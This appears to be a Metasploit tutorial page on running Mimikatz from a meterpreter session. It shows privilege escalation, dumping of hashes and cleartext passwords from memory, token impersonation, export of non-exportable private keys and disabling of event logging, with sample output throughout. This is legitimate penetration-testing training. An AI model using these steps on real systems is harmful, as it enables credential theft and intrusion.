a11y.text MimikatzMimikatz is a great post-exploitation tool written by Benjamin Delpy (gentilkiwi). After the initial exploitation phase, attackers may want to get a firmer foothold on the computer/network. Doing so often requires a set of complementary tools. Mimikatz is an attempt to bundle together some of the most useful tasks that attackers will want to perform.
Fortunately, Metasploit has decided to include Mimikatz as a meterpreter script to allow for easy access to its full set of features without needing to upload any files to the disk of the compromised host.
Note: The version of Mimikatz in metasploit is v1.0, however Benjamin Delpy has already released v2.0 as a stand-alone package on his website. This is relevant as a lot of the syntax has changed with the upgrade to v2.0.
Loading Mimikatz
a11y.text Loading MimikatzAfter obtaining a meterpreter shell, we need to ensure that our session is running with SYSTEM level privileges for Mimikatz to function properly.
meterpreter > getuid
Server username: WINXP-E95CE571A1\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Mimikatz supports 32bit and 64bit Windows architectures. After upgrading our privileges to SYSTEM, we need to verify, with the sysinfo command, what the architecture of the compromised machine is. This will be relevant on 64bit machines as we may have compromised a 32bit process on a 64bit architecture. If this is the case, meterpreter will attempt to load a 32bit version of Mimikatz into memory, which will cause most features to be non-functional. This can be avoided by looking at the list of running processes and migrating to a 64bit process before loading Mimikatz.
meterpreter > sysinfo
Computer : WINXP-E95CE571A1
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
Since this is a 32bit machine, we can proceed to load the Mimikatz module into memory.
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > help mimikatz
Mimikatz Commands
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom commannd
msv Attempt to retrieve msv creds (hashes)
ssp Attempt to retrieve ssp creds
tspkg Attempt to retrieve tspkg creds
wdigest Attempt to retrieve wdigest creds
Metasploit provides us with some built-in commands that showcase Mimikatz’s most commonly-used feature, dumping hashes and clear text credentials straight from memory. However, the mimikatz_command option gives us full access to all the features in Mimikatz.
meterpreter > mimikatz_command -f version
mimikatz 1.0 x86 (RC) (Nov 7 2013 08:21:02)
Though slightly unorthodox, we can get a complete list of the available modules by trying to load a non-existent feature.
meterpreter > mimikatz_command -f fu::
Module : 'fu' introuvable
Modules disponibles :
- Standard
crypto - Cryptographie et certificats
hash - Hash
system - Gestion système
process - Manipulation des processus
thread - Manipulation des threads
service - Manipulation des services
privilege - Manipulation des privilèges
handle - Manipulation des handles
impersonate - Manipulation tokens d'accès
winmine - Manipulation du démineur
minesweeper - Manipulation du démineur 7
nogpo - Anti-gpo et patchs divers
samdump - Dump de SAM
inject - Injecteur de librairies
ts - Terminal Server
divers - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
sekurlsa - Dump des sessions courantes par providers LSASS
efs - Manipulations EFS
To query the available options for these modules, we can use the following syntax.
meterpreter > mimikatz_command -f divers::
Module : 'divers' identifié, mais commande '' introuvable
Description du module : Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module
noroutemon - [experimental] Patch Juniper Network Connect pour ne plus superviser la table de routage
eventdrop - [super experimental] Patch l'observateur d'événements pour ne plus rien enregistrer
cancelator - Patch le bouton annuler de Windows XP et 2003 en console pour déverrouiller une session
secrets - Affiche les secrets utilisateur
Reading Hashes and Passwords from Memory
a11y.text Reading Hashes and Passwords from MemoryWe can use both the built-in Metasploit commands as well as the native Mimikatz commands to extract hashes and clear-text credentials from the compromised machine.
Built-In Metasploit:
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;78980 NTLM WINXP-E95CE571A1 Administrator lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f }
0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;56683 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP WINXP-E95CE571A1$ n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;56683 NTLM
0;78980 NTLM WINXP-E95CE571A1 Administrator SuperSecretPassword
Native Mimikatz:
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : winxp-e95ce571a1
BootKey : 553d8c1349162121e2a5d3d0f571db7f
Rid : 500
User : Administrator
LM :
NTLM : d6eec67681a3be111b5605849505628f
Rid : 501
User : Guest
LM :
Rid : 1000
User : HelpAssistant
LM : 6165cd1a0ebc61e470475c82cd451e14
Rid : 1002
User : SUPPORT_388945a0
LM :
NTLM : 771ee1fce7225b28f8aec4a88aea9b6a
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword }
Other Modules
a11y.text Other ModulesThe other Mimikatz modules contain a lot of useful features. A more complete feature list can be found on Benjamin Delpy’s blog – http://blog.gentilkiwi.com/. Below are several usage examples to get an understanding of the syntax employed.
The handle module can be used to list/kill processes and impersonate user tokens.
meterpreter > mimikatz_command -f handle::
Module : 'handle' identifié, mais commande '' introuvable
Description du module : Manipulation des handles
list - Affiche les handles du système (pour le moment juste les processus et tokens)
processStop - Essaye de stopper un ou plusieurs processus en utilisant d'autres handles
tokenImpersonate - Essaye d'impersonaliser un token en utilisant d'autres handles
nullAcl - Positionne une ACL null sur des Handles
meterpreter > mimikatz_command -f handle::list
760 lsass.exe -> 1004 Token NT AUTHORITY\NETWORK SERVICE
760 lsass.exe -> 1008 Process 704 winlogon.exe
760 lsass.exe -> 1052 Process 980 svchost.exe
760 lsass.exe -> 1072 Process 2664 fubar.exe
760 lsass.exe -> 1084 Token NT AUTHORITY\LOCAL SERVICE
760 lsass.exe -> 1096 Process 704 winlogon.exe
760 lsass.exe -> 1264 Process 1124 svchost.exe
760 lsass.exe -> 1272 Token NT AUTHORITY\ANONYMOUS LOGON
760 lsass.exe -> 1276 Process 1804 psia.exe
760 lsass.exe -> 1352 Process 480 jusched.exe
760 lsass.exe -> 1360 Process 2056 TPAutoConnSvc.exe
760 lsass.exe -> 1424 Token WINXP-E95CE571A1\Administrator
The service module allows you to list, start, stop, and remove Windows services.
meterpreter > mimikatz_command -f service::
Module : 'service' identifié, mais commande '' introuvable
Description du module : Manipulation des services
list - Liste les services et pilotes
start - Démarre un service ou pilote
stop - Arrête un service ou pilote
remove - Supprime un service ou pilote
mimikatz - Installe et/ou démarre le pilote mimikatz
meterpreter > mimikatz_command -f service::list
WIN32_SHARE_PROCESS STOPPED RemoteRegistry Remote Registry
WIN32_OWN_PROCESS STOPPED RpcLocator Remote Procedure Call (RPC) Locator
980 WIN32_OWN_PROCESS RUNNING RpcSs Remote Procedure Call (RPC)
760 WIN32_SHARE_PROCESS RUNNING SamSs Security Accounts Manager
1124 WIN32_SHARE_PROCESS RUNNING Schedule Task Scheduler
1804 WIN32_OWN_PROCESS RUNNING Secunia PSI Agent Secunia PSI Agent
3460 WIN32_OWN_PROCESS RUNNING Secunia Update Agent Secunia Update Agent
The crypto module allows you to list and export any certificates and their corresponding private keys that may be stored on the compromised machine. This is possible even if they are marked as non-exportable.
meterpreter > mimikatz_command -f crypto::
Module : 'crypto' identifié, mais commande '' introuvable
Description du module : Cryptographie et certificats
listProviders - Liste les providers installés)
listStores - Liste les magasins système
listCertificates - Liste les certificats
listKeys - Liste les conteneurs de clés
exportCertificates - Exporte les certificats
exportKeys - Exporte les clés
patchcng - [experimental] Patch le gestionnaire de clés pour l'export de clés non exportable
patchcapi - [experimental] Patch la CryptoAPI courante pour l'export de clés non exportable
meterpreter > mimikatz_command -f crypto::listProviders
Providers CryptoAPI :
Gemplus GemSAFE Card CSP v1.0
Infineon SICRYPT Base Smart Card CSP
Microsoft Base Cryptographic Provider v1.0
Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
Microsoft Base DSS Cryptographic Provider
Microsoft Base Smart Card Crypto Provider
Microsoft DH SChannel Cryptographic Provider
Microsoft Enhanced Cryptographic Provider v1.0
Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)
Microsoft RSA SChannel Cryptographic Provider
Microsoft Strong Cryptographic Provider
Never Lose at Minesweeper Again!
a11y.text Never Lose at Minesweeper Again!Mimikatz also includes a lot of novelty features. One of our favourites is a module that can read the location of mines in the classic Windows Minesweeper game, straight from memory!
meterpreter > mimikatz_command -f winmine::infos
Mines : 99
Dimension : 16 lignes x 30 colonnes
Champ :
. . . . . . * . * 1 1 * 1 1 * . . . . . . * . *
. . * . . . . . . 1 1 1 1 1 1 2 . * . * * . * * . .
. * . . . . . * . 1 1 1 1 1 * . . . * . . * . . . .
. . . . . * . * * 2 1 1 2 * . . . * * . . * . . . . * .
. . * . . * . . . * 1 1 * . * . . . . . . . * . * . . .
. * * . . . . . . . 2 1 1 1 . * . . . . * . . * . . . . . .
. . . . . . . . . . . * . . . . . * . . . . . * * . . . . .
. . . * . * . . . . . * . * . . . . * . . . . * . . . . . .
. . . . . * * . * . * . * . * * . * * * . . . . . . . . * .
* * . * . . . 3 1 2 1 2 1 . . * . . * . . * . . * . . . . .
. . . . * * * 1 1 . . * * . . . * . . . . . . * . *
. . * * * . 3 1 1 1 2 * 2 2 2 . * . . . . . . * . . . .
. . . . . * 1 1 1 2 * . 1 1 1 . . . . * . * * * . . . .
. . . . . . 1 1 * . . . 1 1 * . . . * . . . . . * . .
. . . . . . 1 1 2 . . . * 1 1 1 1 1 * * . * . . . . * .
. * . . . . . * . . . * . 1 1 . * . . . . . . . *